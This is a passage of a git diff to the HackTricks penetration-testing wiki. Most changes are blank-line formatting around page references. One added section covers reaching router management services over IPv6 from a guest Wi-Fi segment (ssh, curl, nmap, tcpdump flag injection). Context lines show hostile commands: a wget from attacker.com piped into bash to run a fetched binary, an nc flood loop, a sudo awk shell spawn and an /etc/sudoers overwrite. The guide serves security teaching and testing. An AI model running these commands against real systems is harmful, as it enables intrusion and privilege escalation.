admin@[fe80::1%wlan0]`. 
+ +Alternative: use ndisc6 suite if available: + +```bash +# rdisc6 sends RS and prints RAs in a friendly way +rdisc6 +``` + +2) Reach exposed services over IPv6 from the guest SSID: + +```bash +# SSH/Telnet example (replace with discovered address) +ssh -6 admin@[2001:db8:abcd::1] +# Web UI over IPv6 +curl -g -6 -k 'http://[2001:db8:abcd::1]/' +# Fast IPv6 service sweep +nmap -6 -sS -Pn -p 22,23,80,443,7547 [2001:db8:abcd::1] +``` + +3) If the management shell provides packet-capture tooling via a wrapper (e.g., tcpdump), check for argument/filename injection that allows passing extra tcpdump flags like `-G/-W/-z` to achieve post-rotate command execution. See: + + +{{#ref}} +../../linux-hardening/privilege-escalation/wildcards-spare-tricks.md +{{#endref}} + +Defences/notes: + +- Don’t bind management to guest/public bridges; apply IPv6 firewalls on SSID bridges. +- Rate-limit and filter NDP/RS/RA on guest segments where feasible. +- For services that must be reachable, enforce authN/MFA and strong rate-limits. + ## References @@ -326,7 +379,6 @@ sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning - [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html) - [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904) - [Practical Guide to IPv6 Attacks in a Local Network](https://habr.com/ru/articles/930526/) +- [FiberGateway GR241AG – Full Exploit Chain](https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/) {{#include ../../banners/hacktricks-training.md}} - - 
diff --git a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index 484ce2343..e0945ef75 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md @@ -119,6 +119,7 @@ These tools and techniques form a comprehensive set for conducting NTLM Relay at In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how: + {{#ref}} ../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md {{#endref}} @@ -245,4 +246,3 @@ You now own **NT AUTHORITY\SYSTEM**. {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/README.md b/src/generic-methodologies-and-resources/pentesting-wifi/README.md index 1f7a9b166..aeac6c3b6 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -23,6 +23,7 @@ iwlist wlan0 scan #Scan available wifis ### Hijacker & NexMon (Android internal Wi-Fi) + {{#ref}} enable-nexmon-monitor-and-injection-on-android.md {{#endref}} @@ -796,4 +797,3 @@ TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/phishing-methodology/README.md b/src/generic-methodologies-and-resources/phishing-methodology/README.md index e50a993b4..50251587a 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/README.md 
+++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md @@ -26,6 +26,7 @@ - **New TLD**: Same domain using a **new TLD** (e.g., zelster.org) - **Homoglyph**: It **replaces** a letter in the domain name with **letters that look similar** (e.g., zelfser.com). + {{#ref}} homograph-attacks.md {{#endref}} @@ -414,6 +415,7 @@ Once everything is ready, just launch the campaign! If for any reason you want to clone the website check the following page: + {{#ref}} clone-a-website.md {{#endref}} @@ -423,6 +425,7 @@ clone-a-website.md In some phishing assessments (mainly for Red Teams) you will want to also **send files containing some kind of backdoor** (maybe a C2 or maybe just something that will trigger an authentication).\ Check out the following page for some examples: + {{#ref}} phishing-documents.md {{#endref}} @@ -452,6 +455,7 @@ One easy way to check if you domain appears in any blacklist is to use [https:// However, there are other ways to know if the victim is **actively looking for suspicions phishing activity in the wild** as explained in: + {{#ref}} detecting-phising.md {{#endref}} @@ -557,12 +561,14 @@ Monitor for AzureAD/AWS/Okta events where **`deleteMFA` + `addMFA`** occur **wit Attackers can silently copy malicious commands into the victim’s clipboard from a compromised or typosquatted web page and then trick the user to paste them inside **Win + R**, **Win + X** or a terminal window, executing arbitrary code without any download or attachment. + {{#ref}} clipboard-hijacking.md {{#endref}} ## Mobile Phishing & Malicious App Distribution (Android & iOS) + {{#ref}} mobile-phishing-malicious-apps.md {{#endref}} @@ -577,4 +583,3 @@ mobile-phishing-malicious-apps.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md index 195dd87af..ed70fe101 100644 
--- a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md @@ -84,7 +84,8 @@ Blue-teams can combine clipboard, process-creation and registry telemetry to pin ## Related Tricks * **Discord Invite Hijacking** often abuses the same ClickFix approach after luring users into a malicious server: - {{#ref}} + +{{#ref}} discord-invite-hijacking.md {{#endref}} @@ -93,4 +94,4 @@ Blue-teams can combine clipboard, process-creation and registry telemetry to pin - [Fix the Click: Preventing the ClickFix Attack Vector](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/) - [Pastejacking PoC – GitHub](https://github.com/dxa4481/Pastejacking) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index 8c98a15de..519818c77 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -150,10 +150,12 @@ There are several ways to **force NTLM authentication "remotely"**, for example, **Check these ideas and more in the following pages:** + {{#ref}} ../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md {{#endref}} + {{#ref}} ../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md {{#endref}} @@ -168,4 +170,3 @@ Don't forget that you cannot only steal the hash or the authentication but also {{#include ../../banners/hacktricks-training.md}} - 
diff --git a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md index 46c518dde..006748ab6 100644 --- a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md +++ b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md @@ -708,6 +708,7 @@ if __name__ == "__main__": You can check the output of this script on this page: + {{#ref}} https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/python/bypass-python-sandboxes/broken-reference/README.md {{#endref}} @@ -765,6 +766,7 @@ class HAL9000(object): > [!CAUTION] > Check also the following page for gadgets that will r**ead sensitive information from Python internal objects**: + {{#ref}} ../python-internal-read-gadgets.md {{#endref}} @@ -1114,6 +1116,7 @@ Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) o **Check out this tutorial**: + {{#ref}} ../../basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md {{#endref}} diff --git a/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md b/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md index 7734330a0..7335db3c1 100644 --- a/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md +++ b/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md @@ -259,6 +259,7 @@ Use this payload to **change `app.secret_key`** (the name in your app might be d Check also the following page for more read only gadgets: + {{#ref}} python-internal-read-gadgets.md {{#endref}} @@ -270,4 +271,3 @@ python-internal-read-gadgets.md {{#include ../../banners/hacktricks-training.md}} - 
diff --git a/src/hardware-physical-access/firmware-analysis/README.md b/src/hardware-physical-access/firmware-analysis/README.md index e1f5d80b7..985603ec5 100644 --- a/src/hardware-physical-access/firmware-analysis/README.md +++ b/src/hardware-physical-access/firmware-analysis/README.md @@ -6,6 +6,7 @@ ### Related resources + {{#ref}} synology-encrypted-archive-decryption.md {{#endref}} @@ -61,6 +62,7 @@ If you don't find much with those tools check the **entropy** of the image with Moreover, you can use these tools to extract **files embedded inside the firmware**: + {{#ref}} ../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md {{#endref}} @@ -309,4 +311,3 @@ To practice discovering vulnerabilities in firmware, use the following vulnerabl {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/bypass-bash-restrictions/README.md b/src/linux-hardening/bypass-bash-restrictions/README.md index 6bb8468f6..085478bbb 100644 --- a/src/linux-hardening/bypass-bash-restrictions/README.md +++ b/src/linux-hardening/bypass-bash-restrictions/README.md @@ -330,12 +330,14 @@ ln /f* If you are inside a filesystem with the **read-only and noexec protections** or even in a distroless container, there are still ways to **execute arbitrary binaries, even a shell!:** + {{#ref}} bypass-fs-protections-read-only-no-exec-distroless/ {{#endref}} ## Chroot & other Jails Bypass + {{#ref}} ../privilege-escalation/escaping-from-limited-bash.md {{#endref}} @@ -374,4 +376,3 @@ Practical use cases: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md index 0ae1f001e..023c052db 100644 
--- a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md +++ b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md @@ -69,6 +69,7 @@ wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo For more information about this technique check the Github or: + {{#ref}} ddexec.md {{#endref}} @@ -114,4 +115,3 @@ You can find **examples** on how to **exploit some RCE vulnerabilities** to get {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/freeipa-pentesting.md b/src/linux-hardening/freeipa-pentesting.md index baa1624de..3591668be 100644 --- a/src/linux-hardening/freeipa-pentesting.md +++ b/src/linux-hardening/freeipa-pentesting.md @@ -43,6 +43,7 @@ Keytab files, containing Kerberos principals and encrypted keys, are critical fo You can find more information about how to use tickets in linux in the following link: + {{#ref}} privilege-escalation/linux-active-directory.md {{#endref}} @@ -198,4 +199,3 @@ You can check a detailed explaination in [https://posts.specterops.io/attacking- {{#include ../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/linux-post-exploitation/README.md b/src/linux-hardening/linux-post-exploitation/README.md index 221f36e7d..4b883891e 100644 --- a/src/linux-hardening/linux-post-exploitation/README.md +++ b/src/linux-hardening/linux-post-exploitation/README.md @@ -6,6 +6,7 @@ Let's configure a PAM module to log each password each user uses to login. If you don't know what is PAM check: + {{#ref}} pam-pluggable-authentication-modules.md {{#endref}} @@ -55,4 +56,3 @@ The Pluggable Authentication Module (PAM) is a system used under Linux for user {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index e2b207ad1..835a6bdb1 100644 
--- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -159,6 +159,7 @@ cat /proc/sys/kernel/randomize_va_space 2>/dev/null If you are inside a docker container you can try to escape from it: + {{#ref}} docker-security/ {{#endref}} @@ -410,6 +411,7 @@ rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh mys Read the following page for more wildcard exploitation tricks: + {{#ref}} wildcards-spare-tricks.md {{#endref}} @@ -563,6 +565,7 @@ socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of **Exploitation example:** + {{#ref}} socket-command-injection.md {{#endref}} @@ -632,6 +635,7 @@ Note that if you have write permissions over the docker socket because you are * Check **more ways to break out from docker or abuse it to escalate privileges** in: + {{#ref}} docker-security/ {{#endref}} @@ -640,6 +644,7 @@ docker-security/ If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**: + {{#ref}} containerd-ctr-privilege-escalation.md {{#endref}} @@ -648,6 +653,7 @@ containerd-ctr-privilege-escalation.md If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**: + {{#ref}} runc-privilege-escalation.md {{#endref}} @@ -675,6 +681,7 @@ Policies without a specified user or group apply universally, while "default" co **Learn how to enumerate and exploit a D-Bus communication here:** + {{#ref}} d-bus-enumeration-and-command-injection-privilege-escalation.md {{#endref}} @@ -762,6 +769,7 @@ Some Linux versions were affected by a bug that allows users with **UID > INT_MA Check if you are a **member of some group** that could grant you root privileges: + {{#ref}} interesting-groups-linux-pe/ {{#endref}} 
@@ -1049,10 +1057,12 @@ The project collects legitimate functions of Unix binaries that can be abused to > strace -o /dev/null /bin/sh\ > sudo awk 'BEGIN {system("/bin/sh")}' + {{#ref}} https://gtfobins.github.io/ {{#endref}} + {{#ref}} https://gtfoargs.github.io/ {{#endref}} @@ -1175,6 +1185,7 @@ That means that the configuration files from `/etc/ld.so.conf.d/*.conf` will be If for some reason **a user has write permissions** on any of the paths indicated: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, any file inside `/etc/ld.so.conf.d/` or any folder within the config file inside `/etc/ld.so.conf.d/*.conf` he may be able to escalate privileges.\ Take a look at **how to exploit this misconfiguration** in the following page: + {{#ref}} ld.so.conf-example.md {{#endref}} @@ -1223,6 +1234,7 @@ int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation.\ Read the following page to **learn more about capabilities and how to abuse them**: + {{#ref}} linux-capabilities.md {{#endref}} @@ -1353,6 +1365,7 @@ The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding wit If you find that Forward Agent is configured in an environment read the following page as **you may be able to abuse it to escalate privileges**: + {{#ref}} ssh-forward-agent-exploitation.md {{#endref}} @@ -1598,18 +1611,21 @@ On the other hand, `/etc/init` is associated with **Upstart**, a newer **service ### NFS Privilege escalation + {{#ref}} nfs-no_root_squash-misconfiguration-pe.md {{#endref}} ### Escaping from restricted Shells + {{#ref}} escaping-from-limited-bash.md {{#endref}} ### Cisco - vmanage + {{#ref}} cisco-vmanage.md {{#endref}} 
@@ -1663,9 +1679,9 @@ cisco-vmanage.md Android rooting frameworks commonly hook a syscall to expose privileged kernel functionality to a userspace manager. Weak manager authentication (e.g., signature checks based on FD-order or poor password schemes) can enable a local app to impersonate the manager and escalate to root on already-rooted devices. Learn more and exploitation details here: + {{#ref}} android-rooting-frameworks-manager-auth-bypass-syscall-hook.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md b/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md index af46ecb18..0e48f5000 100644 --- a/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md +++ b/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md @@ -6,6 +6,7 @@ Go to the following link to learn **what is containerd** and `ctr`: + {{#ref}} ../../network-services-pentesting/2375-pentesting-docker.md {{#endref}} @@ -45,6 +46,7 @@ You can run a privileged container as: Then you can use some of the techniques mentioned in the following page to **escape from it abusing privileged capabilities**: + {{#ref}} docker-security/ {{#endref}} @@ -52,4 +54,3 @@ docker-security/ {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/docker-security/README.md b/src/linux-hardening/privilege-escalation/docker-security/README.md index 495a04d57..a966a8f98 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/README.md @@ -155,6 +155,7 @@ Docker makes use of the following Linux kernel Namespaces to achieve Container i For **more information about the namespaces** check the following page: + {{#ref}} namespaces/ {{#endref}} 
@@ -178,6 +179,7 @@ ls -l /proc//ns #Get the Group and the namespaces (some may be uniq to the For more information check: + {{#ref}} cgroups.md {{#endref}} @@ -188,6 +190,7 @@ Capabilities allow **finer control for the capabilities that can be allowed** fo When a docker container is run, the **process drops sensitive capabilities that the proccess could use to escape from the isolation**. This try to assure that the proccess won't be able to perform sensitive actions and escape: + {{#ref}} ../linux-capabilities.md {{#endref}} @@ -196,6 +199,7 @@ When a docker container is run, the **process drops sensitive capabilities that This is a security feature that allows Docker to **limit the syscalls** that can be used inside the container: + {{#ref}} seccomp.md {{#endref}} @@ -204,6 +208,7 @@ seccomp.md **AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**.: + {{#ref}} apparmor.md {{#endref}} @@ -218,6 +223,7 @@ apparmor.md This mechanism ensures that even if a process within a container is compromised, it's confined to interacting only with objects that have the corresponding labels, significantly limiting the potential damage from such compromises. + {{#ref}} ../selinux.md {{#endref}} @@ -231,6 +237,7 @@ In Docker, an authorization plugin plays a crucial role in security by deciding These contexts help ensure that only legitimate requests from authenticated users are processed, enhancing the security of Docker operations. + {{#ref}} authz-and-authn-docker-access-authorization-plugin.md {{#endref}} @@ -261,6 +268,7 @@ nc -lvp 4444 >/dev/null & while true; do cat /dev/urandom | nc 4444; In the following page you can learn **what does the `--privileged` flag imply**: + {{#ref}} docker-privileged.md {{#endref}} 
@@ -341,6 +349,7 @@ In Kubernetes environments, secrets are natively supported and can be further ma **gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers. + {{#ref}} https://github.com/google/gvisor {{#endref}} @@ -349,6 +358,7 @@ https://github.com/google/gvisor **Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense. + {{#ref}} https://katacontainers.io/ {{#endref}} @@ -374,6 +384,7 @@ https://katacontainers.io/ If you are **inside a docker container** or you have access to a user in the **docker group**, you could try to **escape and escalate privileges**: + {{#ref}} docker-breakout-privilege-escalation/ {{#endref}} @@ -382,6 +393,7 @@ docker-breakout-privilege-escalation/ If you have access to the docker socket or have access to a user in the **docker group but your actions are being limited by a docker auth plugin**, check if you can **bypass it:** + {{#ref}} authz-and-authn-docker-access-authorization-plugin.md {{#endref}} @@ -408,4 +420,3 @@ authz-and-authn-docker-access-authorization-plugin.md - [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/) {{#include ../../../banners/hacktricks-training.md}} - 
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md index 1d7ffd35c..695f3d083 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md @@ -64,6 +64,7 @@ capsh --print In the following page you can **learn more about linux capabilities** and how to abuse them to escape/escalate privileges: + {{#ref}} ../../linux-capabilities.md {{#endref}} @@ -84,6 +85,7 @@ A privileged container can be created with the flag `--privileged` or disabling The `--privileged` flag significantly lowers container security, offering **unrestricted device access** and bypassing **several protections**. For a detailed breakdown, refer to the documentation on `--privileged`'s full impacts. + {{#ref}} ../docker-privileged.md {{#endref}} @@ -230,6 +232,7 @@ cat /output Find an **explanation of the technique** in: + {{#ref}} docker-release_agent-cgroups-escape.md {{#endref}} @@ -238,6 +241,7 @@ docker-release_agent-cgroups-escape.md In the previous exploits the **absolute path of the container inside the hosts filesystem is disclosed**. However, this isn’t always the case. In cases where you **don’t know the absolute path of the container inside the host** you can use this technique: + {{#ref}} release_agent-exploit-relative-paths-to-pids.md {{#endref}} @@ -345,6 +349,7 @@ The abuse of these files may allow that: However, you can find **other sensitive files** to check for in this page: + {{#ref}} sensitive-mounts.md {{#endref}} @@ -640,4 +645,3 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new {{#include ../../../../banners/hacktricks-training.md}} - 
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md b/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md index 8094e0eef..9613364e7 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md @@ -98,6 +98,7 @@ mount | grep /proc.*tmpfs Container engines launch the containers with a **limited number of capabilities** to control what goes on inside of the container by default. **Privileged** ones have **all** the **capabilities** accesible. To learn about capabilities read: + {{#ref}} ../linux-capabilities.md {{#endref}} @@ -136,6 +137,7 @@ You can manipulate the capabilities available to a container without running in **Seccomp** is useful to **limit** the **syscalls** a container can call. A default seccomp profile is enabled by default when running docker containers, but in privileged mode it is disabled. Learn more about Seccomp here: + {{#ref}} seccomp.md {{#endref}} @@ -175,6 +177,7 @@ Also, note that when Docker (or other CRIs) are used in a **Kubernetes** cluster **AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**. When you run with the `--privileged` flag, this protection is disabled. + {{#ref}} apparmor.md {{#endref}} @@ -188,6 +191,7 @@ apparmor.md Running a container with the `--privileged` flag disables **SELinux labels**, causing it to inherit the label of the container engine, typically `unconfined`, granting full access similar to the container engine. In rootless mode, it uses `container_runtime_t`, while in root mode, `spc_t` is applied. + {{#ref}} ../selinux.md {{#endref}} @@ -242,4 +246,3 @@ PID USER TIME COMMAND {{#include ../../../banners/hacktricks-training.md}} - 
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md index 186a370b9..cb19ee9ae 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md @@ -4,42 +4,49 @@ ### **PID namespace** + {{#ref}} pid-namespace.md {{#endref}} ### **Mount namespace** + {{#ref}} mount-namespace.md {{#endref}} ### **Network namespace** + {{#ref}} network-namespace.md {{#endref}} ### **IPC Namespace** + {{#ref}} ipc-namespace.md {{#endref}} ### **UTS namespace** + {{#ref}} uts-namespace.md {{#endref}} ### Time Namespace + {{#ref}} time-namespace.md {{#endref}} ### User namespace + {{#ref}} user-namespace.md {{#endref}} @@ -47,4 +54,3 @@ user-namespace.md {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md index 509716f87..e71268fa3 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md @@ -16,6 +16,7 @@ While cgroup namespaces are not a separate namespace type like the others we dis For more information about CGroups check: + {{#ref}} ../cgroups.md {{#endref}} @@ -92,4 +93,3 @@ Also, you can only **enter in another process namespace if you are root**. And y {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md b/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md index 93e551b7e..00ced0c60 100644 --- a/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md 
+++ b/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md @@ -231,6 +231,7 @@ wget http://127.0.0.1:8080/sudoers -O /etc/sudoers [https://gtfobins.github.io](https://gtfobins.github.io/**](https/gtfobins.github.io)\ **It could also be interesting the page:** + {{#ref}} ../bypass-bash-restrictions/ {{#endref}} @@ -239,6 +240,7 @@ wget http://127.0.0.1:8080/sudoers -O /etc/sudoers Tricks about escaping from python jails in the following page: + {{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ {{#endref}} @@ -292,4 +294,3 @@ debug.debug() {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md index 41b1efe5e..161d5810c 100644 --- a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md +++ b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md @@ -235,22 +235,26 @@ docker run --rm -it --pid=host --net=host --privileged -v /:/mnt chr Finally, if you don't like any of the suggestions of before, or they aren't working for some reason (docker api firewall?) you could always try to **run a privileged container and escape from it** as explained here: + {{#ref}} ../docker-security/ {{#endref}} If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../index.html#writable-docker-socket)**.** + {{#ref}} https://github.com/KrustyHack/docker-privilege-escalation {{#endref}} + {{#ref}} https://fosterelli.co/privilege-escalation-via-docker.html {{#endref}} ## lxc/lxd Group + {{#ref}} ./ {{#endref}} 
@@ -266,4 +270,3 @@ Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey* These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot) {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/linux-active-directory.md b/src/linux-hardening/privilege-escalation/linux-active-directory.md index 3d028c054..b13f8e8c7 100644 --- a/src/linux-hardening/privilege-escalation/linux-active-directory.md +++ b/src/linux-hardening/privilege-escalation/linux-active-directory.md @@ -14,6 +14,7 @@ If you have access over an AD in linux (or bash in Windows) you can try [https:/ You can also check the following page to learn **other ways to enumerate AD from linux**: + {{#ref}} ../../network-services-pentesting/pentesting-ldap.md {{#endref}} @@ -22,6 +23,7 @@ You can also check the following page to learn **other ways to enumerate AD from FreeIPA is an open-source **alternative** to Microsoft Windows **Active Directory**, mainly for **Unix** environments. It combines a complete **LDAP directory** with an MIT **Kerberos** Key Distribution Center for management akin to Active Directory. Utilizing the Dogtag **Certificate System** for CA & RA certificate management, it supports **multi-factor** authentication, including smartcards. SSSD is integrated for Unix authentication processes. Learn more about it in: + {{#ref}} ../freeipa-pentesting.md {{#endref}} 
@@ -32,6 +34,7 @@ FreeIPA is an open-source **alternative** to Microsoft Windows **Active Director In this page you are going to find different places were you could **find kerberos tickets inside a linux host**, in the following page you can learn how to transform this CCache tickets formats to Kirbi (the format you need to use in Windows) and also how to perform a PTT attack: + {{#ref}} ../../windows-hardening/active-directory-methodology/pass-the-ticket.md {{#endref}} @@ -126,4 +129,3 @@ crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDO {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/linux-capabilities.md b/src/linux-hardening/privilege-escalation/linux-capabilities.md index 731ab0324..706d7774f 100644 --- a/src/linux-hardening/privilege-escalation/linux-capabilities.md +++ b/src/linux-hardening/privilege-escalation/linux-capabilities.md @@ -1413,6 +1413,7 @@ kill -s SIGUSR1 # After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d ``` + {{#ref}} electron-cef-chromium-debugger-abuse.md {{#endref}} @@ -1676,4 +1677,3 @@ In summary, `CAP_SETPCAP` allows a process to modify the capability sets of othe {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md index 08071e298..561659010 100644 --- a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md +++ b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md @@ -15,6 +15,7 @@ In the **/etc/exports** file, if you find some directory that is configured as * For more information about **NFS** check: + {{#ref}} ../../network-services-pentesting/nfs-service-pentesting.md {{#endref}} 
@@ -143,4 +144,3 @@ drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md b/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md index fcb76fc40..12514ce62 100644 --- a/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md +++ b/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md @@ -6,6 +6,7 @@ If you want to learn more about **runc** check the following page: + {{#ref}} ../../network-services-pentesting/2375-pentesting-docker.md {{#endref}} @@ -44,4 +45,3 @@ runc run demo {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md index 8d796fd17..574760fd1 100644 --- a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md +++ b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md 
